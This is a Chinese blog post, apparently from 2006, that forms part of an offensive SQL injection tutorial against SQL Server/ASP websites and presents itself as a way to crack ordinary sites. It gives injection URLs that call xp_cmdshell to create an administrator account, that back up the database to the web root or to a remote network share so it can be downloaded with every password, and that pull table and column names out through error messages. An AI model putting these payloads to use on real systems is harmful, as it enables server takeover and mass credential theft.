文逸首页 小文论坛 文逸博客 精华文章
 首页 | 新闻 | 论坛 | 博客 | 专题 | FTP | 金融 | 微博 | 图库 | MyHome | 搜索 | 登陆 | 注册 | 帮助 | 设为首页  ·在线人数: 3617
 §您的位置:文逸首页 > easyshow 's home > 【教育学习】专栏 > SQL注入漏洞.
easyshow 的主页网址:http://wonyen.net/home.aspx?id=easyshow 给我留言

 § easyshow  的【教育学习】专栏

  作者:easyshow  发表时间: 2006/3/2 9:05:50    查看: 5616     评论: 1
标题: SQL注入漏洞全接触--高级篇(一)

看完入门篇和进阶篇后,稍加练习,破解一般的网站是没问题了。但如果碰到表名列名猜不到,或程序作者过滤了一些特殊字符,怎么提高注入的成功率?怎么样提高猜解效率?请大家接着往下看高级篇。   

  第一节、利用系统表注入SQLServer数据库   

  SQLServer是一个功能强大的数据库系统,与操作系统也有紧密的联系,这给开发者带来了很大的方便,但另一方面,也为注入者提供了一个跳板,我们先来看看几个具体的例子:   

  ① http://Site/url.asp?id=1;exec master..xp_cmdshell “net user name password /add”-- 

  分号;在SQLServer中表示隔开前后两句语句,--表示后面的语句为注释,所以,这句语句在SQLServer中将被分成两句执行,先是Select出ID=1的记录,然后执行存储过程xp_cmdshell,这个存储过程用于调用系统命令,于是,用net命令新建了用户名为name、密码为password的windows的帐号,接着:   

  ② http://Site/url.asp?id=1;exec master..xp_cmdshell “net localgroup name administrators /add”-- 

  将新建的帐号name加入管理员组,不用两分钟,你已经拿到了系统最高权限!当然,这种方法只适用于用sa连接数据库的情况,否则,是没有权限调用xp_cmdshell的。 

  ③ http://Site/url.asp?id=1 ;;;and db_name()>0   

  前面有个类似的例子and user>0,作用是获取连接用户名,db_name()是另一个系统变量,返回的是连接的数据库名。   

  ④ http://Site/url.asp?id=1;backup database 数据库名 to disk=’c:\inetpub\wwwroot\1.db’;--   

  这是相当狠的一招,从③拿到的数据库名,加上某些IIS出错暴露出的绝对路径,将数据库备份到Web目录下面,再用HTTP把整个数据库就完完整整的下载回来,所有的管理员及用户密码都一览无遗!在不知道绝对路径的时候,还可以备份到网络地址的方法(如\\202.96.xx.xx\Share\1.db),但成功率不高。 

  ⑤ http://Site/url.asp?id=1 ;;;and (Select Top 1 name from sysobjects where xtype=’U’ and status>0)>0   

  前面说过,sysobjects是SQLServer的系统表,存储着所有的表名、视图、约束及其它对象,xtype=’U’ and status>0,表示用户建立的表名,上面的语句将第一个表名取出,与0比较大小,让报错信息把表名暴露出来。第二、第三个表名怎么获取?还是留给我们聪明的读者思考吧。   

  ⑥ http://Site/url.asp?id=1 ;;;and (Select Top 1 col_name(object_id(‘表名’),1) from sysobjects)>0  

  从⑤拿到表名后,用object_id(‘表名’)获取表名对应的内部ID,col_name(表名ID,1)代表该表的第1个字段名,将1换成2,3,4...就可以逐个获取所猜解表里面的字段名。 

  以上6点是我研究SQLServer注入半年多以来的心血结晶,可以看出,对SQLServer的了解程度,直接影响着成功率及猜解速度。在我研究SQLServer注入之后,我在开发方面的水平也得到很大的提高,呵呵,也许安全与开发本来就是相辅相成的吧。 

分享到:


 §评论: SQL注入漏洞全接触--高级篇(一)

0 条评论;  每页显示 15 条评论;   1 / 1               ↑到页首




您未登陆,发表评论时请填写:用户名 密码 注册新用户  
 评论: SQL注入漏洞全接触--高级篇(一)
内容 (8000字以内)
 (CTRL+ENTER提交) 
  关闭窗口  
用户登陆
我要发表文章
搜 索
§easyshow 的网志导航
感想随笔(2)
生活休闲(0)
饮食健康(0)
自然妙趣(0)
潮流时尚(0)
游览见闻(0)
情感绿洲(7)
娱乐搞笑(3)
读图时代(0)
影音视听(2)
商业新知(1)
理论研究(0)
时事纵横(0)
社会文化(0)
文学欣赏(0)
教育学习(27)
§easyshow 的友情链接
关于文逸 | 小文论坛 | 文逸博客 | 文逸金融 | 精华文章网站地图 | 联系我们 | 隐私保护
 Copyright© WWW.WONYEN.NET 2003 - 2021  闽ICP备09016518号-16   本站最高 10508 人同时在线,发生时间 2005-5-17 5:09:15 
 文逸科技 制作维护